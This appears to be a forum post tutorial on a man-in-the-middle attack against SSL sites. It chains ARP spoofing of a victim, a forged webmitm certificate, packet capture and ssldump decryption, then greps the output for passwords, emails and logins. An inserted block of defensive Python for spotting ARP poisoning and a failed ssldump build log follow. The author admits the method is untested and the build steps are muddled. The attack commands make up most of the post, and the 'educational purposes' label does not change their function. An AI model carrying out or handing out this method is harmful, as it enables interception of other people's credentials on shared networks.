Method-Using SSLDump (Educational Purposes only)
I have looked around at many posts that describe ssldump for the *nix platform. In my opinion this is the best example someone has written: a tutorial on how to ARP cache poison SSL websites, or in other words, how to use it on SSL sites.
I have not tested this information yet, because I am facing this ssldump error: ERROR: Couldn't create network handler
Tools Required
Fragrouter
Arpspoof
Dnsspoof
Webmitm
Ethereal (or Wireshark, as I believe it's called these days)
SSLdump
Method
In a console do the following:
1) fragrouter -B1
2) arpspoof -t VictimsIP Router
E.g., arpspoof -t 192.168.1.100 192.168.1.1
This will place you between the router (192.168.1.1) and your victim (192.168.1.100).
3) webmitm -d
This will create an SSL certificate that the victim will hopefully accept. If they don't, the attack will be unsuccessful. You will need to fill in the required fields. This is your certificate.
4) Open up Ethereal and start capturing your packets.
When (if) the victim accepts your fake SSL certificate, Ethereal will start getting a lot of activity. When this happens, stop Ethereal and save your packets to a dump file.
Now it's time to read the data.
5) ssldump -r <dumped-file-name> -k webmitm.crt -d > DUMP
That command opens your Ethereal dump file (<dumped-file-name>), runs it against your fake certificate webmitm.crt, and writes the data to a file called DUMP. The DUMP file will contain the unencrypted packets.
You can now just grep the DUMP file to find the login data. For example:
cat DUMP | grep PASSWORD
You can change PASSWORD to other interesting things such as EMAIL, LOGIN, etc.
I have not tested this yet, but people say it works on lots of occasions. It may be working for some, or it may be an obsolete method. Whatever this method is, it is purely for educational purposes.
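A defender-side check for the ARP cache poisoning in step 2, as an added example that is not part of the original post: on the targeted host, the poisoned gateway entry ends up sharing a MAC address with another machine on the LAN, or no longer matches the MAC recorded for the router. It assumes Linux `ip neigh show` output; the sample lines, MAC values and the pinned MAC are constructed, and the function names are hypothetical.

```python
import re

# Constructed sample of `ip neigh show` output on the targeted host.
# IPs follow the page's example network; all MAC values are made up.
SAMPLE_NEIGH = """\
192.168.1.1 dev eth0 lladdr 02:00:00:aa:bb:cc REACHABLE
192.168.1.50 dev eth0 lladdr 02:00:00:AA:BB:CC STALE
192.168.1.23 dev eth0 lladdr 02:00:00:11:22:33 REACHABLE
192.168.1.77 dev eth0  FAILED
"""

NEIGH_RE = re.compile(r"^(\S+) dev (\S+) lladdr ([0-9a-fA-F:]{17})\b")


def parse_neigh(text):
    """Return {ip: mac} for neighbour entries that carry a link-layer address."""
    table = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:  # FAILED/INCOMPLETE entries have no lladdr and are skipped
            table[m.group(1)] = m.group(3).lower()
    return table


def check_gateway(table, gateway_ip, pinned_mac=None):
    """Return findings about the gateway's ARP entry (empty list = nothing odd)."""
    gw_mac = table.get(gateway_ip)
    if gw_mac is None:
        return ["no ARP entry for gateway %s" % gateway_ip]
    findings = []
    # Check 1: the entry differs from the MAC recorded when the network was trusted.
    if pinned_mac and gw_mac != pinned_mac.lower():
        findings.append("gateway %s is at %s, expected %s"
                        % (gateway_ip, gw_mac, pinned_mac.lower()))
    # Check 2: another host answers with the same MAC as the gateway.
    # Can be legitimate (router with several IPs), so treat it as a lead.
    sharers = sorted(ip for ip, mac in table.items()
                     if mac == gw_mac and ip != gateway_ip)
    if sharers:
        findings.append("gateway %s shares MAC %s with %s"
                        % (gateway_ip, gw_mac, ", ".join(sharers)))
    return findings


if __name__ == "__main__":
    for finding in check_gateway(parse_neigh(SAMPLE_NEIGH), "192.168.1.1",
                                 pinned_mac="02:00:00:de:ad:01"):
        print("ALERT:", finding)
```

A static ARP entry for the router on the host, or Dynamic ARP Inspection on the switch, prevents the poisoned entry from being installed in the first place.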
When I configure ssldump using the .tar method, I extract all the files using the tar -zxf ssldump-0.9b3.tar.gz command and then run
./configure
make
make install
cd ssldump-0.9b3
./configure --with-openssl
make
Then it displays this output:
gcc -g -O2 -DHAVE_LIBM=1 -DHAVE_SYS_TIME_H=1 -DSTDC_HEADERS=1 -DTIME_WITH_SYS_TIME=1 -DSIZEOF_UNSIGNED_SHORT=2 -DSIZEOF_UNSIGNED_INT=4 -DSIZEOF_UNSIGNED_LONG=4 -DSIZEOF_UNSIGNED_LONG_LONG=8 -DRETSIGTYPE=void -DHAVE_VPRINTF=1 -DHAVE_STRDUP=1 -c -o pcap-snoop.o ./base/pcap-snoop.c -D_BSD_SOURCE=1 -DLINUX -I./base/ -I./null/ -I./ssl/ -Icommon/include/ -I./null/ -I./ssl/
./base/pcap-snoop.c:52:21: error: net/bpf.h: No such file or directory
./base/pcap-snoop.c: In function ‘main’:
./base/pcap-snoop.c:207: warning: passing argument 2 of ‘signal’ from incompatible pointer type
./base/pcap-snoop.c:329: warning: passing argument 3 of ‘pcap_loop’ from incompatible pointer type
make: *** [pcap-snoop.o] Error 1
Any ideas? Please comment.